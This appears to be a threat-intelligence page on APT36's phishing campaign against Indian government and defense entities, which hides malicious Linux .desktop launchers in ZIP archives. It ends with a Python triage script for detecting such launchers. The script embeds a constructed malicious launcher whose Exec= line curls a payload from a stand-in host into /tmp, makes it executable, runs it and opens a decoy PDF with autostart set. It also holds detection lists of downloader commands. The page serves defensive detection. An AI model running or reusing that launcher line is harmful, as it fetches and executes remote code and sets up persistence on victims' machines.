
APT36 Linux .desktop phishing campaign against Indian government and defense entities

Campaign
Happening score: 51
1 unique source, 1 article

Summary


APT36 is delivering malicious Linux `.desktop` launchers inside phishing ZIP archives to government and defense entities in India, creating a risk of data exfiltration and persistent espionage access. The operation was first spotted on August 1, 2025 and remains ongoing. The launcher abuses the `.desktop` `Exec=` field to fetch and run a payload while a benign-looking decoy PDF masks the execution from the victim.

Related Happenings

NosyDoor backdoor activity using OneDrive and Google Drive C&C

Malware Activity
First: 18.12.2025 19:34 Last: 18.12.2025 19:34 Sources 1

About this happening: The **NosyDoor** backdoor is being used to **exfiltrate files** and run **shell commands** inside compromised networks, making the **LongNosedGoblin** toolset more dangerous. The...

APT42 SpearSpecter espionage campaign

Campaign
First: 14.11.2025 16:40 Last: 14.11.2025 16:40 Sources 1

About this happening: The **APT42** **SpearSpecter** campaign is **ongoing**, and it is targeting **senior defense and government officials** with personalized social engineering that also reaches **fa...

TransparentTribe BOSS Linux phishing espionage campaign

Campaign
First: 23.10.2025 18:30 Last: 23.10.2025 18:30 Sources 1

About this happening: A **TransparentTribe / APT36** espionage campaign targeting **Indian government Linux systems** has been uncovered, showing an updated phishing operation built around **dedicated...

TikTok activation-guide ClickFix infostealer campaign

Campaign
First: 19.10.2025 21:28 Last: 19.10.2025 21:28 Sources 1

About this happening: A **TikTok**-based **ClickFix** campaign is using fake **free activation guides** to deliver **info-stealing malware**, putting users seeking software activations at risk of **cre...

CAPI Backdoor phishing ZIP campaign targeting Russian automobile and e-commerce sectors

Campaign
First: 18.10.2025 14:41 Last: 18.10.2025 14:41 Sources 1

About this happening: A new **CAPI Backdoor** campaign is targeting **Russian automobile and e-commerce sectors**, using **phishing emails** with **ZIP archives** to deliver malware that can steal brow...

Timeline

  1. 22.08.2025 21:35 1 article · 9mo ago

    APT36 phishing ZIP attacks first spotted in India

    Exploitation Observed

    APT36 began phishing-delivered ZIP campaigns against government and defense entities in India, disguising a malicious Linux `.desktop` launcher as a PDF and using the launcher to fetch and execute a payload, present a benign decoy PDF, and establish persistence for espionage and data exfiltration. The activity was first spotted on August 1, 2025 and remained ongoing.

  2. 22.08.2025 21:35 1 article · 9mo ago

    CYFIRMA and CloudSEK detail APT36 Linux launcher abuse

    Technical Analysis Update

    CYFIRMA and CloudSEK describe APT36's campaign against government and defense entities in India, noting phishing-delivered ZIP archives that hide a malicious Linux `.desktop` launcher, abuse the `Exec=` field to write payloads under `/tmp/`, fetch code from an attacker server or Google Drive, launch a decoy PDF in Firefox, and use `X-GNOME-Autostart-enabled=true`, cron jobs, and systemd services for persistence. The payload is described as a Go-based ELF executable that supports data exfiltration and remote command execution over a bi-directional WebSocket channel.

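An added triage helper, written for this page and not taken from CYFIRMA, CloudSEK or the campaign report: it parses a `.desktop` file and scores the launcher traits described in the Summary and in the technical analysis above (an inline shell in `Exec=`, a downloader, staging under `/tmp/`, `chmod +x`, `X-GNOME-Autostart-enabled=true`, and a document-style `Name=` on an application launcher). Both sample launchers, the domain `c2.example.invalid`, the file paths and the score weights are constructed for illustration and are not indicators from the real campaign.

```python
import re
from dataclasses import dataclass, field

# Constructed samples for illustration only; neither is a real artifact from
# the campaign. The second mimics the launcher shape described in the analysis:
# a PDF-looking name, an inline shell in Exec= that fetches a payload into
# /tmp/, runs it, opens a decoy PDF, and asks GNOME to autostart it at login.
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Comment=Edit text files
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

MALICIOUS_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "curl -fsSL http://c2.example.invalid/p -o /tmp/.cache_bin; chmod +x /tmp/.cache_bin; nohup /tmp/.cache_bin >/dev/null 2>&1 & firefox /tmp/Meeting_Notice.pdf"
"""

DOWNLOADERS = ("curl ", "wget ", "python3 -c", "python -c", "base64 -d")
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
URL_RE = re.compile(r'https?://[^\s"\'`;&|)<>]+')
INLINE_SHELL_RE = re.compile(r"(?:^|[\s/])(?:ba|z|da)?sh\s+-c\b")


def parse_desktop(text: str) -> dict:
    """Parse the [Desktop Entry] group of a .desktop file into a dict.

    Comments, blank lines and other groups are ignored; a repeated key keeps
    its last value. Only the first '=' splits key from value, so an Exec=
    line that itself contains '=' stays intact.
    """
    entry = {}
    in_entry = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_entry = line == "[Desktop Entry]"
            continue
        if in_entry and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


@dataclass
class Triage:
    score: int = 0
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Threshold is an assumption for this example; tune it on your own fleet.
        return self.score >= 5


def triage_desktop(text: str, filename: str = "") -> Triage:
    """Score a .desktop file against the launcher traits the analysis describes."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    t = Triage(urls=URL_RE.findall(exec_line))

    def hit(points: int, why: str) -> None:
        t.score += points
        t.reasons.append(why)

    if INLINE_SHELL_RE.search(exec_line):
        hit(3, "Exec= runs an inline shell command (sh -c)")
    if any(d in exec_line for d in DOWNLOADERS):
        hit(3, "Exec= invokes a downloader or decoder")
    if any(d in exec_line for d in STAGING_DIRS):
        hit(2, "Exec= stages or runs a file under a world-writable temp directory")
    if "chmod" in exec_line and "+x" in exec_line:
        hit(2, "Exec= marks a file executable at launch time")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        hit(2, "X-GNOME-Autostart-enabled=true requests login-time autostart")
    # An application launcher whose Name= or on-disk name ends in a document
    # extension is posing as a document: file managers display Name= and hide
    # the real .desktop suffix.
    if entry.get("Type", "") == "Application":
        for label in (entry.get("Name", ""), filename.removesuffix(".desktop")):
            if label.lower().endswith(DOC_EXTS):
                hit(2, f"launcher poses as a document: {label!r}")
                break
    return t


if __name__ == "__main__":
    for name, text in (("gedit.desktop", BENIGN_DESKTOP),
                       ("Meeting_Notice.pdf.desktop", MALICIOUS_DESKTOP)):
        result = triage_desktop(text, name)
        verdict = "SUSPICIOUS" if result.suspicious else "benign"
        print(f"{name}: {verdict} (score {result.score})")
        for reason in result.reasons:
            print("  -", reason)
        for url in result.urls:
            print("  url:", url)
```

Run it over every `.desktop` extracted from a suspect ZIP, and also over `~/.config/autostart/` on hosts that opened such an archive, since that directory is where `X-GNOME-Autostart-enabled=true` takes effect; the extracted URLs feed directly into proxy and DNS log searches.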